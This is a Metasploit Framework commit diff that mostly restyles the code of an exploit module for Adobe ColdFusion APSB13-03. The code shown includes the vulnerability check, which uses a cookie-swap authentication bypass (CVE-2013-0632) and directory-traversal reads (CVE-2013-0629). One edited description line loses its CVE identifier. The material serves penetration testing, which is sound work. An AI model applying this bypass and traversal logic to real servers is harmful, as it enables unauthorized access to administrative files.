infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

up to date

bug/bundler_fix
jvazquez-r7 2013-04-17 11:54:12 -05:00
parent 48def7dbdb
commit bbf7cc4394
1 changed files with 10 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

20
modules/exploits/multi/http/adobe_coldfusion_apsb13_03.rb
View File

@ -21,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Description' => %q{
This module exploits a number of vulnerabilities in Adobe ColdFusion APSB13-03:
CVE-2013-0625 (arbitrary command execution in scheduleedit.cfm (9.x only)),
CVE-2013-0629 (directory traversal), and CVE-2013-0632 (authentication bypass)
CVE-2013-0629 (directory traversal), and (authentication bypass)
},
'Author' =>
[
@ -522,7 +522,7 @@ class Metasploit3 < Msf::Exploit::Remote
if datastore['USERNAME'] and datastore['PASSWORD']
vuln_without_bypass = false
paths.each do |path|
cf_cookies = componentutils_login datastore['USERNAME'], datastore['PASSWORD']
cf_cookies = componentutils_login(datastore['USERNAME'], datastore['PASSWORD'])
if traverse_read(path, cf_cookies) =~ /ADOBE SYSTEMS INCORPORATED/
vulns += 1
vuln_without_bypass = true
@ -540,11 +540,11 @@ class Metasploit3 < Msf::Exploit::Remote
# now try with the CVE-2013-0632 bypass, in the event that this wasn't *totally* wide open
vuln_with_bypass = false
paths.each do |path|
cf_cookies = adminapi_login datastore['USERNAME'], datastore['PASSWORD'], true
cf_cookies = adminapi_login(datastore['USERNAME'], datastore['PASSWORD'], true)
# we need to take the cookie value from CFAUTHORIZATION_cfadmin
# and use it for CFAUTHORIZATION_componentutils
cf_cookies['CFAUTHORIZATION_componentutils'] = cf_cookies['CFAUTHORIZATION_cfadmin']
cf_cookies.delete 'CFAUTHORIZATION_cfadmin'
cf_cookies.delete('CFAUTHORIZATION_cfadmin')
if traverse_read(path, cf_cookies) =~ /ADOBE SYSTEMS INCORPORATED/
vulns += 1
vuln_with_bypass = true
@ -553,9 +553,9 @@ class Metasploit3 < Msf::Exploit::Remote
end
if vuln_with_bypass
print_status "#{datastore['RHOST']} is vulnerable to CVE-2013-0629 in combination with CVE-2013-0632"
print_status("#{datastore['RHOST']} is vulnerable to CVE-2013-0629 in combination with CVE-2013-0632")
else
print_status "#{datastore['RHOST']} is not vulnerable to CVE-2013-0629 in combination with CVE-2013-0632"
print_status("#{datastore['RHOST']} is not vulnerable to CVE-2013-0629 in combination with CVE-2013-0632")
end
vulns > 0
@ -568,15 +568,15 @@ class Metasploit3 < Msf::Exploit::Remote
# the vulnerability for CVE-2013-0632 is that if RDS is disabled during install but
# subsequently *enabled* after install, the password is unset so we simply must
# check that and only that.
cf_cookies = adminapi_login Rex::Text.rand_text_alpha(4), Rex::Text.rand_text_alpha(4), true
cf_cookies = adminapi_login(Rex::Text.rand_text_alpha(4), Rex::Text.rand_text_alpha(4), true)
if cf_cookies.empty?
print_status "#{datastore['RHOST']} is not vulnerable to CVE-2013-0632"
print_status("#{datastore['RHOST']} is not vulnerable to CVE-2013-0632")
else
print_status "#{datastore['RHOST']} is vulnerable to CVE-2013-0632"
print_status("#{datastore['RHOST']} is vulnerable to CVE-2013-0632")
return true
end
else
print_error "Cannot test #{datastore['RHOST']} CVE-2013-0632 with USERDS off"
print_error("Cannot test #{datastore['RHOST']} CVE-2013-0632 with USERDS off")
end
false
end